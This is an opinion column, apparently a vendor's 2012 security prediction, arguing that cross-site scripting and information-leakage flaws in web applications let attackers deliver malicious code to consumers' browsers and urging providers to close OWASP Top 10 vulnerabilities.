In the past, end users of your web applications have been your biggest threat. In 2012, however, that relationship may be reversed as attackers are stepping up efforts to use your web applications as a channel to deliver attack-enabling malicious code to more and more unsuspecting Internet users. These infections, in turn, may end up targeting your systems in a vicious cycle.
It used to be that phishing and other focused social-engineering scams were the source of unsuspecting end-user infections. But education and the continuing evolution of end-user security agents that scan for viruses and malicious code have decreased the chances for attackers to successfully infiltrate clients.
Coupled with the growth of tablets, smartphones, and an expanding base of Internet-connected devices – all requiring specific, targeted code to exploit – attackers have turned their attention to more efficient means of distribution: web applications.
By leveraging standards like HTML and the commonality of web application support across all platforms, attackers are able to harness the resources of consumers to attack websites nearly at will. Using vulnerabilities in existing web applications, attackers inject code that is rarely identified as malicious by security tools into the data driving web applications.
Web Application Vulnerabilities Threaten Consumer Security
It turns out that a majority of web applications remain unable to prevent many of the OWASP Top 10 vulnerabilities and are therefore vulnerable to exploitation. WhiteHat Security’s Winter 2011 Website Security Statistics Report noted that “Most websites were exposed to at least one serious vulnerability every day of 2010, or nearly so (9–12 months of the year).
Only 16% of websites were vulnerable less than 30 days of the year overall.” The report goes on to present data indicating that the two most prevalent vulnerabilities present in web applications were cross-site scripting and generic “information leakage.”
This is troubling as cross-site scripting enables attackers to plant their attack code while information leakage vulnerabilities allow malicious code to successful carry out the theft of sensitive information. The relationship between the two should not be lightly dismissed as it is quite possible with a combination of the two that an unwitting consumer could aid attackers in stealing their own personal data.
As web application standards like HTML5 continue to broaden the execution capabilities of the browser – and increase the number of platforms and devices on which such capabilities can be deployed – the attractiveness of scripting-based attacks is also increasing.
Attackers have already leveraged such attack tools to use resources on unwitting consumers devices to successfully attack and disrupt services of high-profile sites, and there is no reason to believe such attacks will diminish in the near future.
Indeed, with more and more adoption of HTML5 and Web 2.0 integrated applications, the reality is that such attacks are likely to increase.
Because the delivery mechanism for these tools is often web applications, it behooves system administrators and security professionals to ensure public-facing applications are well protected against exploitation of common vulnerabilities. Cross-site scripting and SQL injection attacks are well understood and yet often ignored considering the danger they pose to the integrity of both corporate resources and consumer environments.
Protecting Web Applications to Protect Consumers
It is increasingly the case that attackers leverage common web application vulnerabilities to plant attack code that is later delivered to unsuspecting consumers via the browser where the attack code is activated. This code may be used as part of a dynamic DoS attack, or as a mechanism to exploit yet another vulnerability in an effort to gain unauthorized access to systems or data. Your systems or data.
The connection between web application security and the security of consumer devices and data should not be overlooked. Looking ahead to 2012,it is almost certainly the case that the cycle will gain even more traction as organizations adopt HTML5 as the standard for web application development.
The standards’ expanded capabilities to communicate with both devices and sites provide new opportunities for attackers to exploit both traditional vulnerabilities as well as newly discovered ones. The expansion of the client environment opens up more opportunity for attackers to take advantage of consumers and use their resources and reach to execute attacks of various designs.
Breaking the cycle requires web application providers to increase their own security, ensuring they have addressed the top vulnerabilities through which attackers plant attack code or are directly able to access systems and data for which they were never authorized.
Consumer web security is increasingly tied to web application security – and vice-versa. As the trend continues, it behooves organizations to do what they are able to interrupt the cycle of infection and distribution, and in the process reduce both their own risk and that of their visitors and end users.
About the author: Lori MacVittie is the Sr. Technical Marketing Manager for F5 Networks.
The Tech Herald welcomes 2012 related threat predictions from vendors, as long as they do not reference the end of the world and remain product neutral. All submissions are subject to editing and are due by December 20, 2011. Submissions can be delivered to [email protected] with the email subject of 2012 Predictions.